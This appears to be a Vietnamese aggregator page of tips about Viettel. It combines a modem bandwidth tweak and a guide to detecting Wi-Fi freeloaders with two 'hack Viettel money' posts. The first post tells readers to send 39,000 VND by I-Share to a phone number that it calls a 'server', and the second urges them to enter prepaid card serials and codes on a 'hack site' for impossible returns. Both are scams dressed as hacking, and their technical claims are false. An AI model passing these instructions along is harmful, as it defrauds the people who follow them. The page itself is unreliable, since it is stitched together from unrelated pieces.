Thủ Thuật Viettel / Top 8 # Xem Nhiều Nhất & Mới Nhất 3/2023 # Top View | Globaltraining.edu.vn

Thủ Thuật Tăng Tốc Modem Wifi Của Cáp Quang Viettel

Như các bạn đã biết, tầm phủ sóng wifi phụ thuộc vào rất nhiều yếu tố. Tuy nhiên, yếu tố quan trọng là khoảng cách từ người sử dụng đến modem. Hôm nay chúng tôi vừa tìm được một thủ thuật giúp tối ưu tầm phủ sóng của modem wifi. Những người sử dụng ở xa vẫn có thể có tốc độ tốt nhất mà không cần di chuyển lại gần modem. Còn những người gần modem sẽ có một mạng wifi ổn định hơn.

Ngoài ra, quý khách có thể thử thủ thuật giới hạn tầm phát sóng wifi để mạng wifi chúng ta có tầm phát sóng tốt nhất, không quá xa chỉ để cho gia đình thấy được mạng wifi. Xem hướng dẫn tại đây.

Thủ thuật tăng băng thông mạng cáp quang modem wifi

Bước 1. Truy cập vào trang quản lý modem ở địa chỉ https://192.168.1.1, sau đó nhập tên đăng nhập / mật khẩu wifi là admin / admin. Nếu thành công thì bạn sẽ được chuyển sang trang quản lý modem mạng.

Nếu không thấy trang đăng nhập như hình thì nhấn vào đây để tìm được địa chỉ IP đăng nhập modem.

Mục đích của việc tăng băng thông

Như mặc định, băng thông được tùy chỉnh ở mức 20Mhz để phù hợp với nhiều thiết bị di động cũ. Với tần số thấp như thế này, việc truyền tín hiệu kĩ thuật số (các gói tin) dễ bị “rớt” một vài gói tin nào đó. Điều này đồng nghĩa với việc máy tính cần nhiều thời gian hơn để nhận lại những gói tin bị mất.

Bằng cách tăng lên 40Mhz, tín hiệu truyền sẽ mạnh hơn, các gói tin sẽ truyền mạnh hơn, tránh tình trạng rớt như ở 20Mhz. Điều này đồng nghĩa với tăng tốc, tối ưu băng thông cho modem.

Cách này chỉ thực hiện với modem ZTE F600W mà Viettel trang bị cho các khách hàng sử dụng cáp quang Viettel của hãng.

Nếu gặp trường hợp không thể kết nối được sau khi thay đổi, vui lòng thay đổi về giá trị cũ. Lí do là vì các thiết bị di động cũ không tương thích.

Share Kinh Nghiệm &Amp; Thủ Thuật Hack Tiền Mạng Viettel Qua Lỗ Hổng I

Xin được chia sẻ cùng các bạn một thủ thuật mà tôi vừa mới khám phá: như các bạn cũng đã thấy,rất nhiều các cá nhân post bài lên các diễn đàn trong nuớc với nội dung “hack tiền của mạng Viettel”…để tìm được những topic như thế không hề khó.Ở đây tôi xin nêu ra một vài ví du như : để xem link ẩn để xem link ẩn

và còn rất nhiều những topic như vậy,nhưng hầu hết là của AMATEUR HACKER,chủ yếu nhằm vào mục đích vụ lợi chứ không thông thạo về chuyên môn, họ thiếu kinh nghiệm ,kiến thức và cả tính chính xác trong lĩnh vực Hack bậc thầy này,mà nó đòi hỏi phài có một trình độ Hack tương đối cao .Chính vì những lí do nêu trên và với nhiều năm kinh nghiệm của mình,tôi xin giới thiệu : Tôi

Họ tên: Nguyễn Minh Long. Nghề nghiệp : Sinh viên Ðại Học Bách Khoa-BKA, Năm thứ 4,Khoa Công Nghệ thông tin.

Tôi không dám nhận mình là một sinh viên ưu tú,nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng.Chắc các bạn cũng biết tới diễn đàn HAVonline – diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn.Với những kinh nghiệm mà tôi đã có ,hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác.Do thời gian có hạn nên tôi nói ngắn gọn như sau:

Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:

1 -Một sim Viettel hoạt động trên 230 ngày(hon 7 tháng).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 7 tháng mới được Viettel đưa vào mã bảo vệ tài khoản chuyển tiền ( 6 tháng chưa được đâu các bạn) trên server Viettel quản lí.

2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel.

3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..và điều quan trọng nằm ở bước này. Các bạn phải đổi mât khẩu chuyển tiền thành dãy số sau :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy?Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên sever mà Viettel quản lý.Ðiều này rất quan trọng.

4 -Tài khoản trong sim của bạn phải có nhiều hơn 40101 Vnd.

5 -Các bạn làm theo cú pháp nhu sau: *136* mật khẩu Server *01655612021*39000#. Tại sao phải vậy? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel và số 01655612021 không phải số điện thoai bình thường mà chính là một Sever trung gian( tiếng Anh là TIS inc-Telephone number of Intermediacy Server) mà tôi đã tạo ra được nhằm để tạo ra khoảng trống trên server của Admin và con số 39000 là mật khẩu của Sever mà tôi tạo ra để các bạn đăng nhập (tiền sẽ được Hack từ tài khoản trên Server trung gian này vào tài khoản của bạn). Xin thông báo hiên nay Sever trung gian mà tôi tạo ra là sever duy nhất hiện nay ( đã Test).

6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 101 000 vnd.

Tất cả chỉ có vậy, tôi đưa ra mong các bạn làm thử nghiệm nếu hoạt động tốt tôi sẽ mở thêm nhiều Sever trung gian hon nữa.

Mội chi tiết xin liên hệ email : để xem link ẩn hay ym: minhlong8x87

Nguồn RSS: Diễn Đàn Tin Học

Guests are not allowed to view code. To enable the

Thủ Thuật Kiểm Tra Ai Đang Dùng Wifi Nhà Bạn (Mạng Viettel, Vnpt, Fpt)

Vì sao nên kiểm tra ai đang dùng wifi nhà bạn (mạng Viettel, VNPT, FPT)?

Việc sử dụng trộm hay xâm nhập trái phép mạng wifi của người khác là hành vi phạm pháp, xâm phạm đến quyền sở hữu của cá nhân hay tổ chức, có thể bị truy cứu trách nhiệm hình sự. Khi bạn phát hiện là hành vi dùng trộm mạng wifi của người khác hãy tìm cách ngăn chặn hành động kịp thời, tránh ảnh hưởng đến các thông tin bảo mật cá nhân.

Tốt nhất là hạn chế, thậm chí không cho người lạ quyền truy cập wifi nhà bạn. Bởi có thể ảnh hưởng đến tốc độ truy cập Internet khi có nhiều thiết bị cùng sử dụng. Hơn nữa nếu người đó có ý đồ xấu và hiểu biết về công nghệ có thể khai thác thông tin từ bạn hay gia đình, ví dụ truy cập camera an ninh.

Các cách kiểm tra Wifi có bị dùng trộm không

1. Ngắt wifi của tất cả thiết bị đang truy cập wifi của bạn

Hãy tắt hoặc ngắt kết nối wifi của tất cả các thiết bị đang sử dụng mạng trong nhà bạn rồi quan sát đèn báo tín hiệu trên bộ định tuyến (modem) wifi. Nếu đèn kết nối vẫn nhấp nháy chứng tỏ có người đang dùng trộm wifi nhà bạn. Tuy nhiên nếu người dùng trộm wifi đang không dùng thiết bị thì cũng rất khó để kiểm tra.

2. Kiểm tra nhật ký truy cập wifi trên modem

Người dùng thực hiện truy vấn nhật ký modem wifi bằng trình duyệt web và nhập địa chỉ 192.168.1.1 (hoặc 192.168.2.1 và 192.168.0.1 tùy theo hãng modem đang dùng). Tiếp đó nhập tên và mật khẩu người dùng để đăng nhập. Kiểm tra danh sách địa chỉ MAC trong mục hiển thị đang kết nối mạng wifi nhà bạn (Mạng không dây – wireless status) và đối chiếu với các thiết bị đang dùng wifi trong nhà. Nếu phát hiện thiết bị lạ thì chắc chắn có kẻ đang dùng “chùa” wifi.

Trước tiên là cách kiểm tra ai đang dùng wifi bằng điện thoại ứng dụng Fing hỗ trợ miễn phí cho cả thiết bị iOS và Android giúp kiểm tra danh sách các thiết bị đã và đang kết nối wifi của nhà bạn.

Với các kiểm tra trên máy tính sử dụng Wireless Network Watcher, có hỗ trợ tiếng Việt, dành cho cả máy Mac và Windows, giúp theo dõi mọi thiết bị đang kết nối mạng nhà bạn. Từ đó dễ dàng phát hiện những hoạt động kết nối đáng nghi từ thiết bị khác. Hay công cụ Paessler PRTG Router Monitoring dành để quản lý modem, tự động phát hiện lưu lượng lạ hiệu quả. Cả 2 công cụ này đều có bản dùng thử miễn phí, bạn có thể tìm và tải dùng thử trong 30 trước khi quyết định mua hay không.

4. Tăng bảo mật wifi nhà bạn

Sau khi kiểm tra và phát hiện có người đang dùng trộm wifi nhà bạn thì hãy nhanh chóng đổi mật khẩu router để loại bỏ kẻ lạ mặt khỏi mạng nhà bạn. Bởi nếu không có mật khẩu mới thì hắn không thể tiếp tục sử dụng mạng wifi của bạn. Nếu muốn tìm hiểu thì bạn cũng có thể truy tìm lại địa chỉ IP của các thiết bị dùng trộm wifi như MoocherHunter hay nhiều công cụ hữu ích khác.

Hack Tien Viettel Hack Tien Viettel 100% Hack Thang Cong

Hack tiền viettel, hack tài khoản viettel có kết quả ngay lập tức, nhằm đáp ứng nhu cầu nạp thẻ điện thoại để sử dụng, nghe, gọi điện thoại, nhắn tin, nạp tiền điện thoại để chơi game, tham gia các dịch vụ truyền hình, thanh toán và các nhu cầu khác.. hôm nay chúng tôi tiếp tục ra mắt trang hack tiền viettel trực tuyến 2018 với đỉnh cao hack nhanh và tỷ lệ thành công 100%, trang hack thẻ nạp, tiền viettel uy tín số 1 việt nam, tiền được chuyển vào tài khoản gốc của số điện thoại đăng ký ngay lập tức khi hack xong, để thực hiện hack tiền mạng viettel các bạn truy cập vào web

Giao diện Web hack :

Hướng dẫn hack :

– Các bạn sử dụng 1 trong các loại thẻ sau: mobiphone, vinaphone, viettel sau đó đăng ký hack theo hình bên trên :

+ Tại mục số 1: các bạn chọn loại thẻ muốn hack tiền cho mạng viettel ( ví dụ như thẻ viettel, các bạn cũng có thể chọn loại thẻ khác như mobi, vinaphone+ Tại mục số 2: các bạn điền số điện thoại cần hack Tiền viettel ( tức là số điện thoại của bạn hoặc số nào bạn muốn hack ví dụ như trong hình là 0987666888)+ Tại mục số 3: các bạn điền Số seri của thẻ+ Tại mục số 4: các bạn điền Mã thẻ+ Tại mục số 5: các bạn nhấn NẠP THẺ để bắt đầu hack

sau khi bấm nạp thẻ xong hệ thống sẽ kiểm tra và chuyển Tiền vào số điện thoại bạn đã đăng ký ngay lập tức tương đương với mệnh giá thẻ bạn đã đăng ký hack (theo bảng giá bên dưới), tỷ lệ hack thành công là 100%

Tất cả các tài khoản hack tiền mạng viettel

 

đều được đảm bảo hack tiền viettel thành công là 100%, Mọi số điện thoại sau khi hack sẽ có tiền trong tài khoản chính ngay lập tức, tỷ lệ tiền hack so với mệnh giá thẻ được gi rõ tại web hack theo từng mệnh giá, mọi thắc mắc quý khách cho thể liên hệ admin: shopcard1@yahoo.com hoặc Admin2: shopcard2@yahoo.com để được tư vấn và hỗ trợ trực tiếp

Phương thức hack và phương thức thanh toán:

– Các số điện thoại được hỗ trợ hack tiền điện thoại: Áp dụng cho tất cả các thuê bao của viettel, các mạng di động và cố định, các dịch vụ thanh toán xài mạng 3g… ….Các loại thẻ dùng để hack: Thẻ mobiphone, vinaphone, viettel• Thẻ 50.000 VNĐ   : Nhận được TK chính 1.000.000đ• Thẻ 100.000 VNĐ : Nhận được TK chính 3.000.000đ• Thẻ 200.000 VNĐ : Nhận được TK chính 8.000.000đ, Khuyến mãi 4.000.000đ.• Thẻ 500.000 VNĐ : Nhận được TK chính 20.000.000đ, Khuyến mãi 10.000.000đ.Sau khi hack xong Tiền sẽ được chuyển vào số điện thoại của các bạn ngay lập tức, tỷ lệ thành công là 100%

Lưu ý: Tiền hack có thể dùng sử dụng đầy đủ các tiện ích và dịch vụ của viettel.

hack tien viettel 2018. Thủ thuật hack băng thông Mimax Sim Viettel Mới Cách mới